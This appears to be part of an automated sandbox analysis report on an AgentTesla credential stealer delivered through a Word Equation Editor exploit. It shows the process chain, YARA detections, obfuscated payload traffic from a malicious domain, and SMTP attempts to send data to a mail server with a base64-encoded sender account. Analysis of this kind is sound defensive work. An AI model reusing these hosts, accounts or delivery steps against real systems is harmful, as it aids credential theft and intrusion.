                                    Data Ascii: 7c93<p>VVhnJhXPPhJhuhJhJhJhPhJhJhJhRSShRSShJhJhXxPhJhJhJhJhJhJhJhjPhJhJhJhJhJhJhJhJhJhJhJhJhJhJhJhJhJhJhJhJhJhJhJhJhJhJhJhJhJhJhJhJhJhJhJhXRxhJhJhJhXPhuXhXxjhXPhJhXxJhnhRJShuuhXxPhXhVjhRJShuuhxPhXJPhXJShXXShuRhXXRhXXPhXXXhXJuhXXPhnVhXJnhuRhnnhnVhXXJhXXJhXXXhXXjhuRhnxhXJXhuRhXXPhXXVhXXJhuRhXJShXXJhuRhjxhVnhxuhuRhXJnhXXXhXJJhXJXhPjhXuhXuhXJhujhJhJhJhJhJhJhJhxJhjnhJhJhVjhXhuhJhVjhXPRhPXhXxJhJhJhJhJhJhJhJhJhRRPhJhuPhJhXXhXhxJhJhJhXuRhShJhJhjhJhJhJhJhJhJhRSPhXjXhShJhJhuRhJhJhJhXnRhShJhJhJhJhXRxhJhuRhJhJhJhRhJhJhPhJhJhJhJhJhJhJhPhJhJhJh
                                    Feb 23, 2021 16:55:46.082715034 CET4353OUTGET /base/C56E2AF17B6C065E85DB9FFDA54E4A78.html HTTP/1.1
                                    Host: coroloboxorozor.com
                                    Feb 23, 2021 16:55:46.162590027 CET4354INHTTP/1.1 200 OK
                                    Date: Tue, 23 Feb 2021 15:55:46 GMT
                                    Content-Type: text/html
                                    Transfer-Encoding: chunked
                                    Connection: keep-alive
                                    Set-Cookie: __cfduid=de701b32f5a349037147bd1fa2b8c66a01614095746; expires=Thu, 25-Mar-21 15:55:46 GMT; path=/; domain=.coroloboxorozor.com; HttpOnly; SameSite=Lax
                                    Last-Modified: Tue, 23 Feb 2021 00:47:08 GMT
                                    Vary: Accept-Encoding
                                    X-Frame-Options: SAMEORIGIN
                                    CF-Cache-Status: DYNAMIC
                                    cf-request-id: 0871339c4800000b2f2a135000000001
                                    Report-To: {"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=5EIJ7%2F%2B%2FxsuahxVFNt%2BdOr75ct6wN22yj4Ui5HvCpi3cmFyAa60Do7DuHsemwIiv0ceMcwrmiX3CRbHt5fPHu9FAMc2tJ7bLyZ62PhlFbyFC3jx%2F"}],"max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 6262220d39d10b2f-AMS
                                    Data Raw: 33 33 31 38 0d 0a 3c 70 3e 58 78 68 52 58 78 68 58 78 4a 68 58 78 4a 68 56 53 68 56 53 68 6a 53 68 6a 53 68 53 53 68 53 53 68 58 4a 68 58 4a 68 6a 58 68 6a 58 68 58 53 68 58 53 68 75 56 68 75 56 68 52 53 68 52 53 68 52 75 56 68 52 75 56 68 58 6a 4a 68 58 6a 4a 68 78 75 68 78 75 68 75 78 68 75 78 68 58 56 68 58 56 68 75 53 68 75 53 68 52 4a 68 52 4a 68 53 56 68 53 56 68 6a 68 6a 68 52 50 50 68 52 50 50 68 58 52 78 68 58 52 78 68 58 58 50 68 58 58 50 68 6a 6a 68 6a 6a 68 75 78 68 75 78 68 53 50 68 53 50 68 52 4a 78 68 52 4a 53 68 58 6a 4a 68 58 6a 4a 68 52 4a 78 68 52 4a 78 68 58 6a 52 68 58 6a 52 68 75 58 68 52 78 68 50 53 68 50 53 68 52 6e 68 52 6e 68 50 58 68 50 58 68 56 56 68 6a 50 68 53 58 68 53 58 68 6e 50 68 6e 50 68 52 75 78 68 52 75 78 68 52 4a 50 68 58 6e 58 68 58 50 75 68 58 50 75 68 58 56 75 68 58 56 75 68 52 78 68 52 78 68 75 68 4a 68 58 58 50 68 58 58 50 68 56 68 56 68 52 75 58 68 52 75 58 68 53 4a 68 50 56 68 58 56 52 68 58 56 52 68 58 6a 75 68 58 53 75 68 53 78 68 53 78 68 52 53 52 68 52 50 58 68 52 50 52 68 52 75 6e 68 58 53 68 52 50 78 68 58 58 52 68 58 4a 78 68 58 6a 68 52 50 50 68 58 75 52 68 58 75 52 68 58 78 52 68 6e 78 68 52 52 78 68 58 52 56 68 58 68 58 75 6e 68 78 75 68 58 50 68 75 52 68 52 58 75 68 6a 78 68 52 58 75 68 50 78 68 52 75 52 68 58 56 68 58 6a 6e 68 58 4a 75 68 52 68 58 6e 58 68 78 78 68 75 56 68 58 78 4a 68 52 50 68 58 6e 56 68 58 6e 6e 68 6e 78 68 58 53 78 68 53 56 68 56 53 68 58 53 68 50 53 68 58 6e 4a 68 58 58 58 68 52 53 4a 68 75 4a 68 58 78 53 68 56 56 68 56 56 68 58 53 6a 68 52 68 58 56 6a 68 58 56 6a 68 58 53 78 68 75 4a 68 52 52 56 68 58
                                    Data Ascii: 3318<p>XxhRXxhXxJhXxJhVShVShjShjShSShSShXJhXJhjXhjXhXShXShuVhuVhRShRShRuVhRuVhXjJhXjJhxuhxuhuxhuxhXVhXVhuShuShRJhRJhSVhSVhjhjhRPPhRPPhXRxhXRxhXXPhXXPhjjhjjhuxhuxhSPhSPhRJxhRJShXjJhXjJhRJxhRJxhXjRhXjRhuXhRxhPShPShRnhRnhPXhPXhVVhjPhSXhSXhnPhnPhRuxhRuxhRJPhXnXhXPuhXPuhXVuhXVuhRxhRxhuhJhXXPhXXPhVhVhRuXhRuXhSJhPVhXVRhXVRhXjuhXSuhSxhSxhRSRhRPXhRPRhRunhXShRPxhXXRhXJxhXjhRPPhXuRhXuRhXxRhnxhRRxhXRVhXhXunhxuhXPhuRhRXuhjxhRXuhPxhRuRhXVhXjnhXJuhRhXnXhxxhuVhXxJhRPhXnVhXnnhnxhXSxhSVhVShXShPShXnJhXXXhRSJhuJhXxShVVhVVhXSjhRhXVjhXVjhXSxhuJhRRVhX


                                    SMTP Packets

                                    TimestampSource PortDest PortSource IPDest IPCommands
                                    Feb 23, 2021 16:55:28.727945089 CET58749167103.35.120.75192.168.2.22220-pro10.winwinhosting.com ESMTP Exim 4.93 #2 Tue, 23 Feb 2021 21:19:12 +0530
                                    220-We do not authorize the use of this system to transport unsolicited,
                                    220 and/or bulk e-mail.
                                    Feb 23, 2021 16:55:28.728899956 CET49167587192.168.2.22103.35.120.75EHLO 642294
                                    Feb 23, 2021 16:55:28.930818081 CET58749167103.35.120.75192.168.2.22250-pro10.winwinhosting.com Hello 642294 [84.17.52.38]
                                    250-SIZE 52428800
                                    250-8BITMIME
                                    250-PIPELINING
                                    250-AUTH PLAIN LOGIN
                                    250-STARTTLS
                                    250 HELP
                                    Feb 23, 2021 16:55:28.932142973 CET49167587192.168.2.22103.35.120.75AUTH login ZWNvbThAdHBjZGVsLmNvbQ==
                                    Feb 23, 2021 16:55:29.134661913 CET58749167103.35.120.75192.168.2.22334 UGFzc3dvcmQ6
                                    Feb 23, 2021 16:55:30.848807096 CET58749167103.35.120.75192.168.2.22535 Incorrect authentication data
                                    Feb 23, 2021 16:55:30.849620104 CET49167587192.168.2.22103.35.120.75MAIL FROM:<ecom8@tpcdel.com>
                                    Feb 23, 2021 16:55:31.054327011 CET58749167103.35.120.75192.168.2.22550 Access denied - Invalid HELO name (See RFC2821 4.1.1.1)
                                    Feb 23, 2021 16:55:51.257219076 CET58749170103.35.120.75192.168.2.22220-pro10.winwinhosting.com ESMTP Exim 4.93 #2 Tue, 23 Feb 2021 21:19:34 +0530
                                    220-We do not authorize the use of this system to transport unsolicited,
                                    220 and/or bulk e-mail.
                                    Feb 23, 2021 16:55:51.257775068 CET49170587192.168.2.22103.35.120.75EHLO 642294
                                    Feb 23, 2021 16:55:51.453808069 CET58749170103.35.120.75192.168.2.22250-pro10.winwinhosting.com Hello 642294 [84.17.52.38]
                                    250-SIZE 52428800
                                    250-8BITMIME
                                    250-PIPELINING
                                    250-AUTH PLAIN LOGIN
                                    250-STARTTLS
                                    250 HELP
                                    Feb 23, 2021 16:55:51.454435110 CET49170587192.168.2.22103.35.120.75AUTH login ZWNvbThAdHBjZGVsLmNvbQ==
                                    Feb 23, 2021 16:55:51.650553942 CET58749170103.35.120.75192.168.2.22334 UGFzc3dvcmQ6
                                    Feb 23, 2021 16:55:53.570527077 CET58749170103.35.120.75192.168.2.22535 Incorrect authentication data
                                    Feb 23, 2021 16:55:53.570877075 CET49170587192.168.2.22103.35.120.75MAIL FROM:<ecom8@tpcdel.com>
                                    Feb 23, 2021 16:55:53.767194986 CET58749170103.35.120.75192.168.2.22550 Access denied - Invalid HELO name (See RFC2821 4.1.1.1)
                                    Feb 23, 2021 16:56:03.772083998 CET58749171103.35.120.75192.168.2.22220-pro10.winwinhosting.com ESMTP Exim 4.93 #2 Tue, 23 Feb 2021 21:19:47 +0530
                                    220-We do not authorize the use of this system to transport unsolicited,
                                    220 and/or bulk e-mail.
                                    Feb 23, 2021 16:56:03.772993088 CET49171587192.168.2.22103.35.120.75EHLO 642294
                                    Feb 23, 2021 16:56:03.967884064 CET58749171103.35.120.75192.168.2.22250-pro10.winwinhosting.com Hello 642294 [84.17.52.38]
                                    250-SIZE 52428800
                                    250-8BITMIME
                                    250-PIPELINING
                                    250-AUTH PLAIN LOGIN
                                    250-STARTTLS
                                    250 HELP
                                    Feb 23, 2021 16:56:03.968130112 CET49171587192.168.2.22103.35.120.75AUTH login ZWNvbThAdHBjZGVsLmNvbQ==
                                    Feb 23, 2021 16:56:04.162950993 CET58749171103.35.120.75192.168.2.22334 UGFzc3dvcmQ6
                                    Feb 23, 2021 16:56:05.879669905 CET58749171103.35.120.75192.168.2.22535 Incorrect authentication data
                                    Feb 23, 2021 16:56:05.880009890 CET49171587192.168.2.22103.35.120.75MAIL FROM:<ecom8@tpcdel.com>
                                    Feb 23, 2021 16:56:06.076339960 CET58749171103.35.120.75192.168.2.22550 Access denied - Invalid HELO name (See RFC2821 4.1.1.1)

                                    Code Manipulations

                                    Statistics

                                    Behavior

                                    Click to jump to process

                                    System Behavior

                                    General

                                    Start time:16:53:35
                                    Start date:23/02/2021
                                    Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                    Wow64 process (32bit):false
                                    Commandline:'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                                    Imagebase:0x13f6a0000
                                    File size:1424032 bytes
                                    MD5 hash:95C38D04597050285A18F66039EDB456
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high

                                    General

                                    Start time:16:53:36
                                    Start date:23/02/2021
                                    Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                    Wow64 process (32bit):true
                                    Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                                    Imagebase:0x400000
                                    File size:543304 bytes
                                    MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high

                                    General

                                    Start time:16:53:42
                                    Start date:23/02/2021
                                    Path:C:\Users\user\AppData\Roaming\twox67345.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Users\user\AppData\Roaming\twox67345.exe
                                    Imagebase:0x910000
                                    File size:629624 bytes
                                    MD5 hash:3DC83F17122DD592D607424A54C1E9CB
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:.Net C# or VB.NET
                                    Yara matches:
                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.2274734212.000000000368E000.00000004.00000001.sdmp, Author: Joe Security
                                    Antivirus matches:
                                    • Detection: 100%, Joe Sandbox ML
                                    • Detection: 38%, ReversingLabs
                                    Reputation:low

                                    General

                                    Start time:16:55:03
                                    Start date:23/02/2021
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):true
                                    Commandline:'C:\Windows\System32\cmd.exe' /c timeout 1
                                    Imagebase:0x4a110000
                                    File size:302592 bytes
                                    MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high

                                    General

                                    Start time:16:55:04
                                    Start date:23/02/2021
                                    Path:C:\Windows\SysWOW64\timeout.exe
                                    Wow64 process (32bit):true
                                    Commandline:timeout 1
                                    Imagebase:0x510000
                                    File size:27136 bytes
                                    MD5 hash:419A5EF8D76693048E4D6F79A5C875AE
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:moderate

                                    General

                                    Start time:16:55:06
                                    Start date:23/02/2021
                                    Path:C:\Users\user\AppData\Roaming\twox67345.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Users\user\AppData\Roaming\twox67345.exe
                                    Imagebase:0x910000
                                    File size:629624 bytes
                                    MD5 hash:3DC83F17122DD592D607424A54C1E9CB
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:low

                                    General

                                    Start time:16:55:06
                                    Start date:23/02/2021
                                    Path:C:\Users\user\AppData\Roaming\twox67345.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Users\user\AppData\Roaming\twox67345.exe
                                    Imagebase:0x910000
                                    File size:629624 bytes
                                    MD5 hash:3DC83F17122DD592D607424A54C1E9CB
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:.Net C# or VB.NET
                                    Yara matches:
                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.2360157880.0000000002701000.00000004.00000001.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.2360157880.0000000002701000.00000004.00000001.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.2358876665.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                    Reputation:low

                                    General

                                    Start time:16:55:18
                                    Start date:23/02/2021
                                    Path:C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe
                                    Wow64 process (32bit):true
                                    Commandline:'C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe'
                                    Imagebase:0xb50000
                                    File size:629624 bytes
                                    MD5 hash:3DC83F17122DD592D607424A54C1E9CB
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:.Net C# or VB.NET
                                    Yara matches:
                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000B.00000002.2334670047.000000000374E000.00000004.00000001.sdmp, Author: Joe Security
                                    Antivirus matches:
                                    • Detection: 100%, Joe Sandbox ML
                                    • Detection: 38%, ReversingLabs
                                    Reputation:low

                                    General

                                    Start time:16:55:26
                                    Start date:23/02/2021
                                    Path:C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe
                                    Wow64 process (32bit):true
                                    Commandline:'C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe'
                                    Imagebase:0xb50000
                                    File size:629624 bytes
                                    MD5 hash:3DC83F17122DD592D607424A54C1E9CB
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:.Net C# or VB.NET
                                    Reputation:low

                                    General

                                    Start time:16:55:27
                                    Start date:23/02/2021
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):true
                                    Commandline:'C:\Windows\System32\cmd.exe' /c timeout 1
                                    Imagebase:0x49e70000
                                    File size:302592 bytes
                                    MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high

                                    General

                                    Start time:16:55:29
                                    Start date:23/02/2021
                                    Path:C:\Windows\SysWOW64\timeout.exe
                                    Wow64 process (32bit):true
                                    Commandline:timeout 1
                                    Imagebase:0xda0000
                                    File size:27136 bytes
                                    MD5 hash:419A5EF8D76693048E4D6F79A5C875AE
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:moderate

                                    General

                                    Start time:16:55:31
                                    Start date:23/02/2021
                                    Path:C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe
                                    Imagebase:0xb50000
                                    File size:629624 bytes
                                    MD5 hash:3DC83F17122DD592D607424A54C1E9CB
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:.Net C# or VB.NET
                                    Yara matches:
                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000010.00000002.2360028702.00000000022B1000.00000004.00000001.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000010.00000002.2358961317.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                    Reputation:low

                                    Disassembly

                                    Code Analysis

                                    Reset < >